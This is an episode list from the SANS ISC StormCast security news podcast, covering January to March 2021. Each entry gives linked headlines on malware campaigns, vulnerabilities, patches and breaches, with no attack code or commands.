Old TLS Versions: Gone but not Forgotten https://isc.sans.edu/forums/diary/Old+TLS+versions+gone+but+not+forgotten+well+not+really+gone+either/27260/
Perl Netmask Vulnerability https://blog.urth.org/2021/03/29/security-issues-in-perl-ip-address-distros/
VMware vRealize Vulnerability https://www.vmware.com/security/advisories/VMSA-2021-0004.html
Pre-P0wned Docker Containers https://unit42.paloaltonetworks.com/malicious-cryptojacking-images/
3/31/2021 - 5 minutes, 37 seconds

ISC StormCast for Tuesday, March 30th, 2021

Jumping Into Shellcode https://isc.sans.edu/forums/diary/Jumping+into+Shellcode/27256/
PHP git repo compromised https://news-web.php.net/php.internals/113838
npm "netmask" package vulnerability https://sick.codes/universal-netmask-npm-package-used-by-270000-projects-vulnerable-to-octal-input-data-server-side-request-forgery-remote-file-inclusion-local-file-inclusion-and-more-cve-2021-28918/
3/30/2021 - 6 minutes, 54 seconds

ISC StormCast for Friday, March 19th, 2021

A Simple Python Keylogger https://isc.sans.edu/forums/diary/Simple+Python+Keylogger/27216/
New macOS Malware XcodeSpy Targets Xcode Developers with EggShell Backdoor https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/
Zoom Screen Sharing Leak https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-044.txt
MyBB Remote Code Execution https://blog.mybb.com/2021/03/10/mybb-1-8-26-released-security-release/
3/19/2021 - 6 minutes, 4 seconds

ISC StormCast for Thursday, March 18th, 2021

"American Rescue Plan" Used as Theme in Phishing Lures Dropping Dridex https://cofense.com/blog/american-rescue-plan-phish/
Apple May Split Security Updates from Other Updates https://9to5mac.com/2021/03/15/ios-security-fixes-could-soon-be-delivered-separately-from-other-updates-beta-code-suggests/
Polyglot Images on Twitter https://twitter.com/David3141593/status/1371978592679309315
Magento 2 PHP Credit Card Skimmer Saves to JPG https://blog.sucuri.net/2021/03/magento-2-php-credit-card-skimmer-saves-to-jpg.html
3/18/2021 - 5 minutes, 52 seconds

ISC StormCast for Wednesday, March 17th, 2021

One-Click Microsoft Exchange On-Premises Mitigation Tool https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
Microsoft Explains Authentication Issues with Azure Active Directory https://www.documentcloud.org/documents/20515443-authentication-errors-across-multiple-microsoft-services-tracking-id-ln01-p8z
JavaScript-Less Side-Channel Exploits https://arxiv.org/abs/2103.04952
3/17/2021 - 5 minutes, 55 seconds

ISC StormCast for Tuesday, March 16th, 2021

NimzaLoader Malware Written in "nim" https://www.proofpoint.com/uk/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware
Windows 10 Emergency Update to Fix Printing Crashes https://www.bleepingcomputer.com/news/microsoft/windows-10-emergency-updates-released-to-fix-printing-crashes/
Windows Azure AD Outage https://status.azure.com/status
IBM DB2 Patch https://www.ibm.com/support/pages/node/6427855
3/16/2021 - 5 minutes, 2 seconds

ISC StormCast for Monday, March 15th, 2021

Wireshark Code Execution Exploit https://gitlab.com/wireshark/wireshark/-/issues/17232
Google Chrome Vulnerability Exploited in the Wild https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-21193
Malware Installs Honeypot https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/
Twitter "Memphis" Bug https://www.bleepingcomputer.com/news/technology/twitter-bug-automatically-suspends-you-when-tweeting-memphis/
3/15/2021 - 4 minutes, 53 seconds

ISC StormCast for Friday, March 12th, 2021

Piktochart - Phishing with Infographics https://isc.sans.edu/forums/diary/Piktochart+Phishing+with+Infographics/27194/
ProxyLogon Public PoC https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
Windows 10 Crashes After March 10th Updates https://www.bleepingcomputer.com/news/microsoft/windows-10-crashes-when-printing-due-to-microsoft-march-updates/
DNS Vulnerability Updates https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/
Rob Upchurch: Preventing Windows 10 SMHNR DNS Leakage https://www.sans.org/reading-room/whitepapers/dns/preventing-windows-10-smhnr-dns-leakage-40165
3/12/202115 minutes, 44 seconds

ISC StormCast for Thursday, March 11th, 2021

SharpRDP - PSExec without PSExec, PSRemoting without PowerShell https://isc.sans.edu/forums/diary/SharpRDP+PSExec+without+PSExec+PSRemoting+without+PowerShell/27188/
F5 Critical Vulnerabilities https://support.f5.com/csp/article/K02566623
Netgear Updates https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
Linux Foundation sigstore https://sigstore.dev
3/11/2021 (5 minutes, 21 seconds)

ISC StormCast for Wednesday, March 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/
Adobe Updates https://helpx.adobe.com/security.html
Network Camera Breach https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams https://www.bleepingcomputer.com/news/security/hackers-access-surveillance-cameras-at-tesla-cloudflare-banks-more/
Git Vulnerability https://www.openwall.com/lists/oss-security/2021/03/09/3
3/10/2021 (7 minutes, 13 seconds)

ISC StormCast for Tuesday, March 9th, 2021

YARA and CyberChef https://isc.sans.edu/forums/diary/YARA+and+CyberChef/27180/
Apple Updates Everything https://support.apple.com/en-us/HT201222
Google Adds Port 554 to "Restricted Ports" https://chromium.googlesource.com/chromium/src.git/+/refs/heads/master/net/base/port_util.cc
Yet Another Intel Side Channel Attack https://arxiv.org/pdf/2103.03443.pdf
3/9/2021 (5 minutes, 35 seconds)

ISC StormCast for Monday, March 8th, 2021

Update on Microsoft Exchange Vulnerability https://github.com/microsoft/CSS-Exchange/tree/main/Security https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/Exchange https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
Microsoft Adding Excel 4.0 Macro Hooks to AMSI https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/
Apple Find My Device Leak https://arxiv.org/pdf/2103.02282.pdf
3/8/2021 (7 minutes, 29 seconds)

ISC StormCast for Friday, March 5th, 2021

From VBS, PowerShell, C Sharp, Process Hollowing to RAT https://isc.sans.edu/forums/diary/From+VBS+PowerShell+C+Sharp+Process+Hollowing+to+RAT/27168/
Cisco Patches Snort Related Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort-ethernet-dos-HGXgJH8n
VMware View Planner Update https://www.vmware.com/security/advisories/VMSA-2021-0003.html
Google's FLoC Algorithm https://www.eff.org/deeplinks/2021/03/googles-floc-terrible-idea
Supermicro Trickbot Patch https://www.supermicro.com/en/support/security/trickbot
3/5/2021 (6 minutes, 1 second)

ISC StormCast for Thursday, March 4th, 2021

Microsoft Exchange Followup https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/
Saltstack Vulnerability https://www.immersivelabs.com/resources/blog/why-so-salty-local-privilege-escalation-on-saltstack-minions/
GRUB2 Patches https://seclists.org/oss-sec/2021/q1/189
Dependency Confusion in the Wild https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/
3/4/2021 (4 minutes, 53 seconds)

ISC StormCast for Wednesday, March 3rd, 2021

Qakbot Infection with Cobalt Strike https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike/27158/
Exchange Server 0-Day Exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Google Chrome 0-Day Exploits https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html
3/3/2021 (7 minutes, 15 seconds)

ISC StormCast for Tuesday, March 2nd, 2021

Fun with DNS over TLS (DoT) https://isc.sans.edu/forums/diary/Fun+with+DNS+over+TLS+DoT/27150/
Gootloader Update https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/
AOL Phishing https://www.bleepingcomputer.com/news/security/beware-aol-phishing-email-states-your-account-will-be-closed/
Spectre Exploit in the Wild https://dustri.org/b/spectre-exploits-in-the-wild.html
3/2/2021 (6 minutes, 13 seconds)

ISC StormCast for Monday, March 1st, 2021

Pretending to be an Outlook Version Update https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
Geolocating Satori Botnet Scanning Port 26 https://isc.sans.edu/forums/diary/So+where+did+those+Satori+attacks+come+from/27140/
Alexa Skill Security https://www.ndss-symposium.org/wp-content/uploads/ndss2021_5A-1_23111_paper.pdf
T-Mobile Data Breach / SIM Swapping https://beta.documentcloud.org/documents/20492859-t-mobile-feb-2021-bc-data-breach
3/1/2021 (5 minutes, 2 seconds)

ISC StormCast for Friday, February 26th, 2021

Forensicating Azure VMs https://isc.sans.edu/forums/diary/Forensicating+Azure+VMs/27136/
FriarFox Browser Extension Targeting GMail Accounts https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global
JSON Parser Inconsistencies https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities
Apple macOS Update https://www.reddit.com/r/macbook/comments/kge24m/dead_m1_mac_with_usbc_multiport_adapters/
2/26/2021 (5 minutes, 1 second)

ISC StormCast for Thursday, February 25th, 2021

Malspam Pushes GuLoader for Remcos RAT https://isc.sans.edu/forums/diary/Malspam+pushes+GuLoader+for+Remcos+RAT/27132/
vCenter Exploit / Vulnerability Details https://swarm.ptsecurity.com/unauth-rce-vmware/#more-2477
DNS CNAME Tracking https://blog.lukaszolejnik.com/large-scale-analysis-of-dns-based-tracking-evasion-broad-data-leaks-included/
Cisco MSO Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-mso-authbyp-bb5GmBQv
2/25/2021 (5 minutes, 23 seconds)

ISC StormCast for Wednesday, February 24th, 2021

Qakbot In a Response to Full Disclosure Post https://isc.sans.edu/forums/diary/Qakbot+in+a+response+to+Full+Disclosure+post/27130/
Firefox Total Cookie Protection https://blog.mozilla.org/security/2021/02/23/total-cookie-protection/
VMware ESXi / vCenter Server Update https://www.vmware.com/security/advisories/VMSA-2021-0002.html
Replacing Content in Signed PDFs https://www.ndss-symposium.org/wp-content/uploads/ndss2021_1B-4_24117_paper.pdf
2/24/2021 (6 minutes, 8 seconds)

ISC StormCast for Tuesday, February 23rd, 2021

Unprotecting Malicious Documents For Inspection https://isc.sans.edu/forums/diary/Unprotecting+Malicious+Documents+For+Inspection/27126/
Brave Browser DNS Leak https://www.theregister.com/2021/02/22/in_brief_security/
Telephony DoS https://www.ic3.gov/Media/Y2021/PSA210217
2/23/2021 (5 minutes, 45 seconds)

ISC StormCast for Monday, February 22nd, 2021

Dynamic Data Exchange (DDE) is Back in the Wild https://isc.sans.edu/forums/diary/Dynamic+Data+Exchange+DDE+is+Back+in+the+Wild/27116/ https://isc.sans.edu/forums/diary/DDE+and+oledump/27122/
macOS Malware "Prototype" https://redcanary.com/blog/clipping-silver-sparrows-wings/
New Phishing Attack Identified: Malformed URL Prefixes https://www.greathorn.com/blog-new-phishing-attack-identified-malformed-url-prefixes/
Sonicwall SMA 100 Firmware Update https://www.sonicwall.com/support/product-notification/additional-sma-100-series-10-x-and-9-x-firmware-updates-required-updated-feb-19-2-p-m-cst/210122173415410/
2/22/2021 (5 minutes, 48 seconds)

ISC StormCast for Friday, February 19th, 2021

Malspam Pushes Trickbot gtag rob13 https://isc.sans.edu/forums/diary/Malspam+pushing+Trickbot+gtag+rob13/27112/
AppleJeus https://us-cert.cisa.gov/ncas/alerts/aa21-048a
Python 3 Buffer Overflow https://bugs.python.org/issue42938
Apple Platform Security Guide https://support.apple.com/guide/security/welcome/web
2/19/2021 (5 minutes, 40 seconds)

ISC StormCast for Thursday, February 18th, 2021

The new "LinkedInSecureMessage" Phish https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110/
Apple M1 Optimized Malware https://objective-see.com/blog/blog_0x62.html
QNAP Surveillance Station Vulnerability https://www.qnap.com/en/security-advisory/qsa-21-07
Masslogger Exfiltrates User Credentials https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html
2/18/2021 (5 minutes, 53 seconds)

ISC StormCast for Wednesday, February 17th, 2021

More Weirdness on TCP Port 26 https://isc.sans.edu/forums/diary/More+weirdness+on+TCP+port+26/27106/
Microsoft Pulls Servicing Stack Update https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/
Network Monitoring Company Centreon Compromised https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
SHAREit Flaw Could Lead to Remote Code Execution https://www.trendmicro.com/en_us/research/21/b/shareit-flaw-could-lead-to-remote-code-execution.html
VSCode NPM Extension RCE https://github.com/jackadamson/CVE-2021-26700
2/17/2021 (5 minutes, 15 seconds)

ISC StormCast for Tuesday, February 16th, 2021

Securing and Optimizing Networks Using pfSense Traffic Shaper Limiters to Combat Bufferbloat https://isc.sans.edu/forums/diary/Securing+and+Optimizing+Networks+Using+pfSense+Traffic+Shaper+Limiters+to+Combat+Bufferbloat/27102/
Apple to Proxy Safe Browsing Requests https://twitter.com/othermaciej/status/1359736220809531393
Power Outages and Some Network Outages as a Result https://downdetector.com
Phone Scam Success Rates https://www.helpnetsecurity.com/2021/02/15/lost-money-to-phone-scams/ https://nakedsecurity.sophos.com/2021/02/12/sms-tax-scam-unmasked-bogus-but-believable-dont-fall-for-it/
2/16/2021 (6 minutes, 39 seconds)

ISC StormCast for Monday, February 15th, 2021

AgentTesla Dropped Through Automatic Click in Microsoft Help File https://isc.sans.edu/forums/diary/AgentTesla+Dropped+Through+Automatic+Click+in+Microsoft+Help+File/27092/
Telegram Used to Defraud Delivery Services https://thefintechtimes.com/sift-finds-new-telegram-fraud-exploiting-increasing-use-of-food-delivery-services/
Singtel Suffers Zero-Day Cyberattack https://threatpost.com/singtel-zero-day-cyberattack/163938/
Vulnerabilities in Mobile Health Apps https://approov.io/download/all-that-we-let-in_hacking-mhealth-apps-and-apis.pdf
Bloomberg Supermicro Story https://www.bloomberg.com/features/2021-supermicro/ https://www.theregister.com/2021/02/12/supermicro_bloomberg_spying/
2/15/2021 (7 minutes, 49 seconds)

ISC StormCast for Friday, February 12th, 2021

Agent Tesla Hidden in Historical Anti-Malware Tool https://isc.sans.edu/forums/diary/Agent+Tesla+hidden+in+a+historical+antimalware+tool/27088/
McAfee Total Protection Vulnerabilities https://service.mcafee.com/webcenter/portal/oracle/webcenter/page/scopedMD/s55728c97_466d_4ddb_952d_05484ea932c6/Page29.jspx
Intel Patches https://blogs.intel.com/technology/2021/02/ipas-security-advisories-for-february-2021
Discord Used to Distribute Malware https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads
2/12/2021 (5 minutes, 41 seconds)

ISC StormCast for Thursday, February 11th, 2021

Phishing Message to the ISC Handlers E-Mail Distro https://isc.sans.edu/forums/diary/Phishing+message+to+the+ISC+handlers+email+distro/27082/
Google Phishing Statistics https://cloud.google.com/blog/products/workspace/how-gmail-helps-users-avoid-email-scams
Adobe Security Updates https://helpx.adobe.com/security/products/acrobat/apsb21-09.html
Apple Sudo Patch https://support.apple.com/en-us/HT212177
Number:Jack ISN Generation Weaknesses https://www.forescout.com/company/resources/numberjack-weak-isn-generation-in-embedded-tcpip-stacks/
2/11/2021 (5 minutes, 47 seconds)

ISC StormCast for Wednesday, February 10th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2021+Patch+Tuesday/27080/ https://www.theregister.com/2021/02/09/microsoft_patch_tuesday/
Dependency Confusion https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 https://azure.microsoft.com/mediahandler/files/resourcefiles/3-ways-to-mitigate-risk-using-private-package-feeds/3%20Ways%20to%20Mitigate%20Risk%20When%20Using%20Private%20Package%20Feeds%20-%20v1.0.pdf
2/10/2021 (6 minutes, 31 seconds)

ISC StormCast for Tuesday, February 9th, 2021

Tshark and Malware Analysis https://isc.sans.edu/forums/diary/Quickie+tshark+Malware+Analysis/27076/
Barcode Scanner Going Bad https://blog.malwarebytes.com/android/2021/02/barcode-scanner-app-on-google-play-infects-10-million-users-with-one-update/
Morse Code Obfuscation https://www.bleepingcomputer.com/news/security/new-phishing-attack-uses-morse-code-to-hide-malicious-urls/
Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2021-06/
Water Treatment Facility Compromised https://www.reuters.com/article/us-usa-cyber-florida/hackers-broke-into-florida-towns-water-treatment-plant-attempted-to-poison-supply-sheriff-says-idUSKBN2A82FV
2/9/2021 (5 minutes, 49 seconds)

ISC StormCast for Monday, February 8th, 2021

VBA Macro Trying to Alter the Application Menus https://isc.sans.edu/forums/diary/VBA+Macro+Trying+to+Alter+the+Application+Menus/27068/
The Great Suspender Going Malicious https://www.zdnet.com/article/google-kills-the-great-suspender-heres-what-you-should-do-next/ https://github.com/greatsuspender/thegreatsuspender/issues/1263
Google Chrome Zero Day https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html
Plex Media SSDP Amplification DDoS https://www.netscout.com/blog/asert/plex-media-ssdp-pmssdp-reflectionamplification-ddos-attack
2/8/2021 (6 minutes)

ISC StormCast for Friday, February 5th, 2021

Abusing Google Chrome Extension Syncing For Data Exfiltration and C&C https://isc.sans.edu/forums/diary/Abusing+Google+Chrome+extension+syncing+for+data+exfiltration+and+CC/27066/
Microsoft Defender ATP Google Chrome False Positive https://twitter.com/itquartz/status/1356940218138509312
Social Engineering Attacks against Security Researchers Used IE 0-Day https://enki.co.kr/blog/2021/02/04/ie_0day.html# https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/
2/5/2021 (6 minutes, 27 seconds)

ISC StormCast for Thursday, February 4th, 2021

Excel Spreadsheets Push SystemBC Malware https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/
SolarWinds Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389
SolarWinds SANS Lightning Summit https://www.sans.org/webcasts/solarwinds-lightning-summit-118550
SonicWall Patch https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/
Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
Realtek RTL8195A Wi-Fi Module Vulnerability https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered
2/4/2021 (6 minutes, 3 seconds)

ISC StormCast for Wednesday, February 3rd, 2021

New Example of XSL Script Processing aka "Mitre T1220" https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/
Camerfirma Certificate Authority Revocation https://groups.google.com/g/mozilla.dev.security.policy/c/jif4zWNgGPw
Kobalos HPC Linux Malware https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/
Agent Tesla Overwrites Windows AMSI https://threatpost.com/agent-tesla-microsoft-asmi/163581/
2/3/2021 (6 minutes, 7 seconds)

ISC StormCast for Tuesday, February 2nd, 2021

MacOS 11.2 Update https://support.apple.com/en-us/HT212147
Objective-See Tools Now Open Source https://twitter.com/patrickwardle/status/1356149073045143553
iMessage Blastdoor https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html
SonicWall Update https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-confirms-sma-100-series-10-x-zero-day-vulnerability-feb-1-2-p-m-cst/210122173415410/
2/2/2021, 6 minutes, 7 seconds

ISC StormCast for Monday, February 1st, 2021

Perl.com Domain Hijacked https://www.ehackingnews.com/2021/01/perlcom-official-site-for-perl.html
Spamcop Domain Expired https://www.bleepingcomputer.com/news/security/spamcop-anti-spam-service-suffers-an-outage-after-its-domain-expired/
libgcrypt vulnerability https://lists.gnupg.org/pipermail/gnupg-announce/2021q1/000456.html
Fingerprinting QUIC https://arxiv.org/pdf/2101.11871.pdf
2/1/2021, 5 minutes, 25 seconds

ISC StormCast for Friday, January 29th, 2021

New Cryptojacking Malware https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/
SlipStreaming https://www.armis.com/resources/iot-security-blog/nat-slipstreaming-v2-0-new-attack-variant-can-expose-all-internal-network-devices-to-the-internet/
Shadowsocks https://shadowsocks.org/en/index.html
1/29/2021, 6 minutes, 1 second

ISC StormCast for Thursday, January 28th, 2021

Emotet vs. Windows Attack Surface Reduction https://isc.sans.edu/forums/diary/Emotet+vs+Windows+Attack+Surface+Reduction/27036/
Go Lang Vulnerability https://blog.golang.org/path-security
Azure Docker Escape https://www.intezer.com/blog/research/how-we-hacked-azure-functions-and-escaped-docker/
1/28/2021, 6 minutes, 17 seconds

ISC StormCast for Wednesday, January 27th, 2021

Critical sudo Vulnerability https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
Qakbot (QBot) Update https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/
Targeting Security Researchers https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
Apple Updates iOS, iPad, tvOS, watchOS, Xcode and iCloud for Windows https://support.apple.com/en-us/HT201222
1/27/2021, 6 minutes, 41 seconds

ISC StormCast for Tuesday, January 26th, 2021

Fun With nmap NSE Scripts and DoH (DNS over HTTPS) https://isc.sans.edu/forums/diary/Fun+with+NMAP+NSE+Scripts+and+DOH+DNS+over+HTTPS/27026/
Malicious NPM Module Stealing Discord Passwords https://blog.sonatype.com/cursedgrabber-strikes-again-sonatype-spots-new-malware-campaign-against-software-supply-chains
Mitigating the $I30 Bug https://www.osr.com/blog/2021/01/21/mitigating-the-i30bitmap-ntfs-bug/ https://github.com/OSRDrivers/i30Flt
ProtonVPN BSOD https://protonstatus.com/incidents/124
1/26/2021, 4 minutes, 46 seconds

ISC StormCast for Monday, January 25th, 2021

Another File Extension to Block: JNLP https://isc.sans.edu/forums/diary/Another+File+Extension+to+Block+in+your+MTA+jnlp/27018/
SonicWall Vulnerability Used to Breach SonicWall https://www.sonicwall.com/support/product-notification/urgent-security-notice-netextender-vpn-client-10-x-sma-100-series-vulnerability-updated-jan-23-2021/210122173415410/
iObit Forum Breached / Used for Ransomware Distribution https://www.bleepingcomputer.com/forums/t/741190/derohe-ransomware-distributed-through-fake-iobit-one-year-free-license-key-promo/
1/25/2021, 5 minutes, 57 seconds

ISC StormCast for Friday, January 22nd, 2021

PowerShell Dropping REvil Ransomware https://isc.sans.edu/forums/diary/Powershell+Dropping+a+REvil+Ransomware/27012/
SAP Exploit Circulating https://onapsis.com/blog/new-sap-exploit-published-online-how-stay-secure
Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujan2021.html
RDP Used for DDoS https://www.netscout.com/blog/asert/microsoft-remote-desktop-protocol-rdp-reflectionamplification
Billy Wilson: Mitigating Attacks Against Supercomputers with KRSI https://www.sans.org/reading-room/whitepapers/linux/mitigating-attacks-supercomputer-krsi-40010
1/22/2021, 13 minutes, 50 seconds

ISC StormCast for Thursday, January 21st, 2021

SolarWinds Updates https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ https://blog.malwarebytes.com/malwarebytes-news/2021/01/malwarebytes-targeted-by-nation-state-actor-implicated-in-solarwinds-breach-evidence-suggests-abuse-of-privileged-access-to-microsoft-office-365-and-azure-environments/
Cisco Advisories https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
Eavesdropping Vulnerabilities in Various WebRTC Based Video Conferencing Systems https://googleprojectzero.blogspot.com/2021/01/the-state-of-state-machines.html
Oracle Business Intelligence Enterprise Edition XSS https://www.exploit-db.com/exploits/49444
1/21/2021, 7 minutes, 10 seconds

ISC StormCast for Wednesday, January 20th, 2021

Qakbot Activity Resumes After Holiday Break https://isc.sans.edu/forums/diary/Qakbot+activity+resumes+after+holiday+break/27008/
Multiple dnsmasq Vulnerabilities https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq_Technical-Whitepaper.pdf
FreakOut Malware https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/
Kids Break Screensaver https://github.com/linuxmint/cinnamon-screensaver/issues/354
1/20/2021, 5 minutes, 49 seconds

ISC StormCast for Tuesday, January 19th, 2021

Doc And RTF Malicious Document https://isc.sans.edu/forums/diary/Doc+RTF+Malicious+Document/26996/
Center for Internet Security Cisco NX-OS Benchmark https://www.cisecurity.org/cis-benchmarks/
Exploit for Shazam Geolocation Vulnerability https://ash-king.co.uk/blog/Shazlocate-abusing-CVE-2019-8791-CVE-2019-8792
Voice Phishing and Internal Messaging Systems Used to Escalate Privileges https://www.ic3.gov/Media/News/2021/210115.pdf
1/19/2021, 5 minutes, 45 seconds

ISC StormCast for Monday, January 18th, 2021

Scans for DNS over HTTPS https://isc.sans.edu/forums/diary/Obfuscated+DNS+Queries/26992/ https://us-cert.cisa.gov/ncas/current-activity/2021/01/15/nsa-releases-guidance-encrypted-dns-enterprise-environments
Netlogon Domain Controller Enforcement Mode Starting February 9th https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/
Apple Removing ContentFilterExclusionList https://www.patreon.com/posts/46179028
1/18/2021, 5 minutes, 11 seconds

ISC StormCast for Friday, January 15th, 2021

Dynamically Analyzing A Heavily Obfuscated Excel 4 Macro Malicious File https://isc.sans.edu/forums/diary/Dynamically+analyzing+a+heavily+obfuscated+Excel+4+macro+malicious+file/26986/
Odd Filename Corrupts NTFS Disks https://twitter.com/jonasLyk/status/1347900440000811010
Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x
1/15/2021, 4 minutes, 52 seconds

ISC StormCast for Thursday, January 14th, 2021

Hancitor Activity Resumes After a Holiday Break https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/
Intel Hardware-Enabled Ransomware Protections https://www.cybereason.com/blog/cybereason-and-intel-introduce-hardware-enabled-ransomware-protections-for-businesses
Making Clouds Rain: RCE in Microsoft Office 365 https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html#fn:1
SAP Security Patch Day https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=564760476
1/14/2021, 6 minutes, 2 seconds

ISC StormCast for Wednesday, January 13th, 2021

MSFT January 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2021+Patch+Tuesday/26978/
Adobe Patches https://helpx.adobe.com/security.html
MimeCast Cert Stolen https://www.mimecast.com/blog/important-update-from-mimecast/
Leaking Silhouettes of Cross-Origin Images https://blog.mozilla.org/attack-and-defense/2021/01/11/leaking-silhouettes-of-cross-origin-images/
1/13/2021, 6 minutes, 12 seconds

ISC StormCast for Tuesday, January 12th, 2021

Using the NVD Database API Part 3/3 https://isc.sans.edu/forums/diary/Using+the+NVD+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Tool+Drop+CVEScan+Part+3+of+3/26974/
Sysinternals Update https://docs.microsoft.com/en-us/sysinternals/
Ubiquiti Breach https://www.bleepingcomputer.com/news/security/networking-giant-ubiquiti-alerts-customers-of-potential-data-breach/
Run-Only AppleScript Reversing https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
1/12/2021, 5 minutes, 57 seconds

ISC StormCast for Monday, January 11th, 2021

Maldoc Strings Analysis https://isc.sans.edu/forums/diary/Maldoc+Strings+Analysis/26966/
CVSS Reliability Survey https://user-surveys.cs.fau.de/index.php?r=survey/index&sid=248857
Fake Trump Video Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/
SMS Phishing (Smishing) https://www.bbc.com/news/business-55563748
dnsren vulnerability https://www.exploit-db.com/exploits/49394
1/11/2021, 5 minutes, 47 seconds

ISC StormCast for Friday, January 8th, 2021

Using the NIST Database and API to Keep Up with Vulnerabilities https://isc.sans.edu/forums/diary/Using+the+NIST+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Part+1+of+3/26958/
Titan Security Key https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf
The Great Suspender Google Chrome Extension https://www.theregister.com/2021/01/07/great_suspender_malware/
Brian Nishida: Ubuntu Artifacts Generated by Gnome Desktop Environment https://www.sans.org/reading-room/whitepapers/forensics/ubuntu-artifacts-generated-gnome-desktop-environment-40035
1/8/2021, 15 minutes, 50 seconds

ISC StormCast for Thursday, January 7th, 2021

Zyxel Exploitation Under Way https://isc.sans.edu/forums/diary/Scans+for+Zyxel+Backdoors+are+Commencing/26954/
Fortinet Patches https://www.fortiguard.com/psirt?date=01-2021
Foxit PhantomPDF Patches https://www.foxitsoftware.com/support/security-bulletins.html
Firefox Android Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-01/
1/7/2021, 4 minutes, 23 seconds

ISC StormCast for Wednesday, January 6th, 2021

Netfox Detective: An Alternative Open-Source Packet Analysis Tool https://isc.sans.edu/forums/diary/Netfox+Detective+An+Alternative+OpenSource+Packet+Analysis+Tool/26950/
ElectroRAT Drains Cryptocurrency Accounts https://www.intezer.com/blog/research/operation-ElectroRAT-attacker-creates-fake-companies-to-drain-your-crypto-wallets/
